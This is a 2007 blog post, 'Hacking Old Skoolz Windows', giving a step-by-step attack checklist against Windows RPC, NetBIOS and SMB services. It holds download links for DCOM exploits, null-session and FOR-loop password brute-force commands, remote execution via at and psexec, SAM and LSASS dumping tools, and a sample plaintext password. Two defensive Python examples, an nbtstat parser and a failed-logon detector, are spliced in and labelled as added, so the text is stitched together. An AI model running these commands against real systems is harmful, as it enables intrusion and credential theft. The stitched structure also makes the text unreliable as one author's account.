Saturday, June 16, 2007

Hacking Old Skoolz Windows

Port 135 (client-server communications)

Port 139, 445 (authentication and file sharing)

Port 137, 138 (NetBIOS browser, name and lookup functions)



Look for the port 135 endpoint mapper; registered endpoints include Microsoft Outlook, Exchange and the Messenger Service.


Nmap the server to look for port 135.

Run rpcscan or epdump against the server over TCP or UDP port 135.

If UDP ports 1028 or 1029 or TCP port 1025 are open, run rpcscan over those ports as well.

Look for IFID 12345778-1234-abcd-ef00-0123456789ab and 12345778-1234-abcd-ef00-0123456789ac, the LSA and SAMR interfaces respectively. They are found on all Windows NT-family OS versions via named pipes, reachable through an SMB session over TCP port 139 or 445.

Run a walksam query if the SAMR interface is present to glean user information.

Run rpcclient from BackTrack if a valid username and password are known. The LSARPC interface must be present.

Compromise the admin password with the brute-force tool WMICracker.

Use Remoxec to execute arbitrary commands.

Verify whether the server is vulnerable to the RPC DCOM exploits. If patches MS03-026 and MS03-039 are applied, nothing can be done. Otherwise download exploits from:

http://packetstormsecurity.org/0307-exploits/dcom.c
http://packetstormsecurity.org/0307-exploits/DComExpl_UnixWin32.zip
http://packetstormsecurity.org/0307-exploits/rpcdcom.101.zip
http://packetstormsecurity.org/0307-exploits/oc192-dcom.c
http://examples.oreilly.com/networksa/tools/dcom-exploits.zip
http://www.securityfocus.com/bid/8205/exploit/


The DCOM interface can be exploited through:

TCP and UDP port 135 (through RPC server service)
TCP ports 139 and 445 (through SMB and named pipes)
TCP port 593 (through COM Internet Services, if installed)
Use kaHt2 to obtain a remote shell.
Use the SPIKE msrpcfuzz fuzzer for stress testing.


-----------------------------------------------------------------------------------------

NetBIOS Name Service UDP port 137

Dumping the NetBIOS table: nbtstat -A 192.168.1.152

Local Area Connection:
Node IpAddress: [192.168.1.20] Scope Id: []

NetBIOS Remote Machine Name Table

       Name               Type         Status
    ---------------------------------------------
    CARAA          <00>  UNIQUE      Registered
    WORKGROUP      <00>  GROUP       Registered
    CARAA          <20>  UNIQUE      Registered
    WORKGROUP      <1E>  GROUP       Registered

MAC Address = 00-0D-88-CB-30-0B

------------------------------------------------

<00> UNIQUE  hostname
<00> GROUP   domain name
<03> UNIQUE  Messenger service running for that computer
<03> UNIQUE  Messenger service running for the individual logged-in user
<20> UNIQUE  Server service running
<1D> GROUP   master browser name for the subnet
<1B> UNIQUE  domain master browser name, identifies the PDC for that domain
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0661
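The suffix table above is what you need to turn raw nbtstat output into an inventory of what each host is advertising. The following is an added example (not code from the post): a small parser for the nbtstat -A table layout shown above, which decodes each registered name using the suffix meanings listed and flags the entries a defender cares about (Server service exposed, Messenger service running, browser roles). The sample output embedded in it is a constructed copy of the table shown in the post, not a live capture; the <1E> GROUP meaning (browser service elections) is not in the post's table and is added from general NetBIOS knowledge.

```python
"""Decode `nbtstat -A` output into a host inventory (added example, defender tooling).

Assumes the plain-text table layout shown in the post; SAMPLE below is a
constructed copy of that output.
"""
import re
from typing import Dict, List, Optional, Tuple

# Meaning of <suffix>/type pairs as listed in the post, plus <1E> GROUP
# (browser service elections), which appears in the sample output.
SUFFIX_MEANING: Dict[Tuple[str, str], str] = {
    ("00", "UNIQUE"): "hostname",
    ("00", "GROUP"): "domain or workgroup name",
    ("03", "UNIQUE"): "Messenger service (computer or logged-in user name)",
    ("20", "UNIQUE"): "Server service running (file sharing)",
    ("1D", "GROUP"): "master browser for the subnet",
    ("1B", "UNIQUE"): "domain master browser (PDC for the domain)",
    ("1E", "GROUP"): "browser service elections",
}

# One table row: NAME <XX> UNIQUE|GROUP Status
ROW_RE = re.compile(r"^\s*(\S+)\s+<([0-9A-Fa-f]{2})>\s+(UNIQUE|GROUP)\s+(\w+)\s*$")
MAC_RE = re.compile(r"MAC Address\s*=\s*([0-9A-Fa-f-]{17})")

# Constructed sample, copied from the table layout in the post.
SAMPLE = """\
Local Area Connection:
Node IpAddress: [192.168.1.20] Scope Id: []

           NetBIOS Remote Machine Name Table

       Name               Type         Status
    ---------------------------------------------
    CARAA          <00>  UNIQUE      Registered
    WORKGROUP      <00>  GROUP       Registered
    CARAA          <20>  UNIQUE      Registered
    WORKGROUP      <1E>  GROUP       Registered

    MAC Address = 00-0D-88-CB-30-0B
"""


def parse_nbtstat(output: str) -> dict:
    """Return {'names': [row dicts], 'mac': str or None} from nbtstat -A text."""
    names: List[dict] = []
    mac: Optional[str] = None
    for line in output.splitlines():
        m = ROW_RE.match(line)
        if m:
            name, suffix, ntype, status = m.groups()
            suffix = suffix.upper()
            names.append({
                "name": name,
                "suffix": suffix,
                "type": ntype,
                "status": status,
                "meaning": SUFFIX_MEANING.get((suffix, ntype), "not in suffix table"),
            })
            continue
        m = MAC_RE.search(line)
        if m:
            mac = m.group(1).upper()
    return {"names": names, "mac": mac}


def exposure_findings(parsed: dict) -> List[str]:
    """Flag registered names that indicate an exposed service or a browser role."""
    findings: List[str] = []
    for entry in parsed["names"]:
        if entry["status"] != "Registered":
            continue
        key = (entry["suffix"], entry["type"])
        if key == ("20", "UNIQUE"):
            findings.append(f"{entry['name']}: Server service registered; review share ACLs and RestrictAnonymous")
        elif key == ("03", "UNIQUE"):
            findings.append(f"{entry['name']}: Messenger service registered; disable it if not needed")
        elif key in (("1D", "GROUP"), ("1B", "UNIQUE")):
            findings.append(f"{entry['name']}: browser role ({entry['meaning']})")
    return findings


if __name__ == "__main__":
    parsed = parse_nbtstat(SAMPLE)
    print("MAC:", parsed["mac"])
    for row in parsed["names"]:
        print(f"{row['name']:<12} <{row['suffix']}> {row['type']:<7} {row['meaning']}")
    for finding in exposure_findings(parsed):
        print("FINDING:", finding)
```

Run across a subnet's saved nbtstat dumps, the findings list gives a quick view of which machines expose file sharing or still run the Messenger service, which is the same information an attacker reads off the table, put to use for hardening instead.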


NetBIOS Datagram Service UDP port 138
http://www.securityfocus.com/advisories/2556


NetBIOS Session Service TCP port 139

Connect through null session:

net use \\192.168.1.152\IPC$ "" /user:""
net view \\192.168.1.152
Use tools like enum, GetAcct and winfo to enumerate more information.


Brute-force user passwords through the NetBIOS session service with tools like SMBCrack and SMB-AT, or use a Windows FOR loop to try passwords.

1. Create a file credentials.txt with password and username pairs:

Password   Username
""         Administrator
Password   Administrator
Admin      Administrator

2. FOR /F "tokens=1,2*" %i in (credentials.txt) do net use \\192.168.1.152\IPC$ %i /user:%j

3. Using the NetBIOS tool (nat) in a loop, appending each host's output to one file:
FOR /L %i IN (1,1,254) DO nat -u userlist.txt -p passlist.txt 192.168.1.%i >> out.txt
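The loops above produce a burst of failed logons from one source address in a short window, which is exactly what a defender should alert on. The following is an added example (not code from the post): a sliding-window detector run over constructed, simplified Security-log records. Event ID 529 was the pre-Vista "logon failure: unknown user name or bad password" event and 528 the successful logon; the record tuples and timestamps below are constructed for the example, not real log output. The threshold and window are assumed values to tune per environment.

```python
"""Spot password-guessing bursts in failed-logon records (added example, not from the post)."""
from collections import defaultdict
from datetime import datetime, timedelta
from typing import Dict, List, Tuple

# Constructed, simplified records: (timestamp, event_id, source_ip, account).
# 529 = logon failure, 528 = successful logon on NT/2000/XP Security logs.
SAMPLE_EVENTS: List[Tuple[str, int, str, str]] = [
    ("2007-06-16 00:01:00", 529, "192.168.1.20", "Administrator"),
    ("2007-06-16 00:01:01", 529, "192.168.1.20", "Administrator"),
    ("2007-06-16 00:01:02", 529, "192.168.1.20", "Administrator"),
    ("2007-06-16 00:01:03", 529, "192.168.1.20", "Administrator"),
    ("2007-06-16 00:01:04", 529, "192.168.1.20", "Administrator"),
    ("2007-06-16 00:01:05", 529, "192.168.1.20", "Administrator"),
    ("2007-06-16 00:01:07", 528, "192.168.1.20", "Administrator"),  # success right after the burst
    ("2007-06-16 00:05:00", 529, "192.168.1.77", "scadmin"),        # single typo, benign
]

FAILURE_ID = 529
SUCCESS_ID = 528


def max_failures_in_window(times: List[datetime], window: timedelta) -> int:
    """Largest number of failures falling inside any span of length `window`.

    `times` must be sorted ascending; two-pointer sweep, O(n).
    """
    best, j = 0, 0
    for i, t in enumerate(times):
        while t - times[j] > window:
            j += 1
        best = max(best, i - j + 1)
    return best


def detect_password_guessing(
    events: List[Tuple[str, int, str, str]],
    threshold: int = 5,                     # assumed: failures per window that trigger an alert
    window: timedelta = timedelta(minutes=1),
) -> List[Dict]:
    """Return one alert per source IP whose failure rate exceeds the threshold."""
    by_source: Dict[str, List[Tuple[datetime, int, str]]] = defaultdict(list)
    for ts, event_id, src, account in events:
        by_source[src].append((datetime.strptime(ts, "%Y-%m-%d %H:%M:%S"), event_id, account))

    alerts: List[Dict] = []
    for src, rows in by_source.items():
        rows.sort()
        failures = [t for t, event_id, _ in rows if event_id == FAILURE_ID]
        if not failures or max_failures_in_window(failures, window) < threshold:
            continue
        last_failure = failures[-1]
        # A success from the same source shortly after the burst suggests a guess landed.
        success_after = any(
            event_id == SUCCESS_ID and failures[0] <= t <= last_failure + window
            for t, event_id, _ in rows
        )
        alerts.append({
            "source": src,
            "failures": len(failures),
            "accounts": sorted({a for _, event_id, a in rows if event_id == FAILURE_ID}),
            "success_after_burst": success_after,
        })
    return alerts


if __name__ == "__main__":
    for alert in detect_password_guessing(SAMPLE_EVENTS):
        severity = "HIGH" if alert["success_after_burst"] else "MEDIUM"
        print(f"[{severity}] {alert['source']}: {alert['failures']} failed logons "
              f"against {', '.join(alert['accounts'])}")
```

An account lockout policy blunts the FOR-loop approach directly, and the "success after burst" flag is the case worth paging on: it is the signature of a guessed password rather than a noisy but unsuccessful sweep.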


Connect with a valid user:
Use smbclient to enumerate more information.
net use \\192.168.1.152\C$ * /user:scadmin (Will prompt for a password)
net use \\192.168.1.152\C$ ronald3211 /user:scadmin
at \\192.168.1.152 00:04 c:\Windows\system32\cmd.exe

Access and modify registry keys using:
Regdmp.exe
Regini.exe
Reg.exe

Accessing the SAM Database and LSASS

Pwdump5
Lsadump2



CIFS Service running on TCP and UDP port 445

SMB-AT to enumerate user and system information.
smbserverscan to scan for SMB-related ports.
smbgetserverinfo to get server information.
smbNAT to provide more details about the server.

smbdumpusers to enumerate users over ports 139 and 445:
smbdumpusers -i 192.168.1.152 -m 2 -P1

smbbf for brute-force password-grinding attacks against both the NetBIOS and CIFS services:
smbbf -i 192.168.1.152 -p wordlist.txt -u users.txt -v -P1

The following need an admin username and password:
samrdump to list all usernames on the server
rpcdump to list all endpoint bindings

Registry path controlling null sessions: HKLM\SYSTEM\CurrentControlSet\Control\Lsa
RestrictAnonymous = 0, 1 or 2

Use pwdump5 to capture the SAM file.
Use netcat to open a shell on the remote OS.
Use psexec through port 139 or 445 to execute commands:
psexec \\192.168.1.152 -u Admin -p password -s cmd.exe


IIS buffer overflow

IIS 5.0 SSL remote root exploit: use thciisslame.

32 comments:

Anonymous said...

Hoh ... lam00 & n00b

Anonymous said...

Can anyone recommend the top Patch Management tool for a small IT service company like mine? Does anyone use Kaseya.com or GFI.com? How do they compare to these guys I found recently: N-able N-central network security software? What is your best take in cost vs performance among those three? I need a good advice please... Thanks in advance!
